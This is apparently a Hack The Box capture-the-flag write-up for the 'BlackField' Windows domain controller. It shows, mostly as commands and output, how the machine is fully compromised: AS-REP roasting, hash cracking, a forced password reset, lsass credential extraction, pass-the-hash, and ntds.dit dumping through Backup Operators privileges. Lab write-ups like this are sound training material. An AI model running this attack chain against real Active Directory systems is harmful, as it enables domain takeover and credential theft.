HTB - BlackField
Machine Info
Backfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. Once user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.
Enumeration
Scope
IP Address: 10. 10.10.192
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,389,445,593,3268,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-12 23:31:40Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m02s
| smb2-time:
| date: 2024-07-12T23:31:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required* Open ports: 53,88,135,389,445,593,3268,5985
* Services: DNS - KERBEROS - RPC - SMB - winRM
* Important Notes: Domain: BLACKFIELD.localRPC Enumeration
SMB Enumeration
When I connected to smb server with anonymous login, it failed
However, when I attempted to authenticate with guest account, I got a hit
smbclient shows the same results, too
I mounted the share to my kali machine to explore it easily
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\profiles$" ./mount
Password for root@\\10.10.10.192\profiles$:
The folders have names of humans which can be users' home directories, So I will append these names to a list and attempt it against Kerberos to find valid usernames
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount | tee -a users.lst
<snip>Kerberos Enumeration
I found three valid users with kerbrute
When I attempted ASREP-Roasting attack against these users, I got a hash of user support
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275cevioeb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9:#00^BlackKnight
Session..........: hashcat
Status...........: CrackedInitial Access
Confirm the credentials we got
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnightList shares that support has access to
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share I couldn't find any interesting files even I had valid credentials, So I will continue enumeration with
bloodhound.py
Enumerate the domain with bloodhound.py and feed the zip file to bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d blackfield.local -c allLooking at bloodhound, I found that suppport can Chane password of audit2020
I provide a custom query to bloodhound to see what user can PSRemote to the machine
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
I searched for a way to change user's password from without access to the machine and I found this command from this post: https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ rpcclient -U "support%#00^BlackKnight" $ip
rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo audit2020 23 P@ssword123!I managed to change the user password but still not have access to the machine, So I will try to enumerate the share again with the user audit2020
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssword123! I got a read access on share forensic with the user audit2020
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!' --shares
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssword123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share I will mount the share to my kali machine and start navigate it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\forensic" ./mount -o "username=audit2020,password=P@ssword123\!"
[sudo] password for kali:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount
commands_output memory_analysis toolsThese two directories look interesting and lsass.zip file is the most important file here
zip file content
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip -l lsass.zip
Archive: lsass.zip
Length Date Time Name
--------- ---------- ----- ----
143044222 2020-02-23 11:02 lsass.DMP
--------- -------
143044222 1 file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMPI will extract secrets from this memory dump with pypykatz, It's like mimikatz but for Linux
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ pypykatz lsa minidump ./lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
<snip>
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a8955
<snip>I tried to authenticate with NT hash for svc_backup and administrator. I got a hit with svc_backup but didn't with admin
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE we know from bloodhound that we can PSRemote to the machine with svc_backup account, So I will start evil-winrm
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
3920bb317a0bef51xxxxxxxxxxxxxxxxUser Flag: 3920bb317a0bef51xxxxxxxxxxxxxxxx
Privilege Escalation
svc_backup is a member of privileged group Backup operators which can be abused to get Domain admin privileges.
I will create a backup of ntds.dit as shadow copy with diskshadow.exe. create this file that contains commands for diskshadow utility
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exitI run an issue when running diskshadow, So I asked the community, and the solution was in endiness of the file and can be solved by this command
unix2dos vss.dshCreate a shadow copy
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s .\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 7/12/2024 7:46:57 PM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
The shadow copy was successfully exposed as E:\.
-> end backup
-> exitCopy the database file to current directory
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.ditget the system hive which we need to decrypt the database
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSETM SYSTEM.SAVDump the secrets from the database
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480bxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a6504030ea199802f249588cdcabfab1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u administrator -H 184fb5e5178480bexxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4375a629c7c67c8e29dxxxxxxxxxxxxRoot Flag: 4375a629c7c67c8exxxxxxxxxxxx
Last updated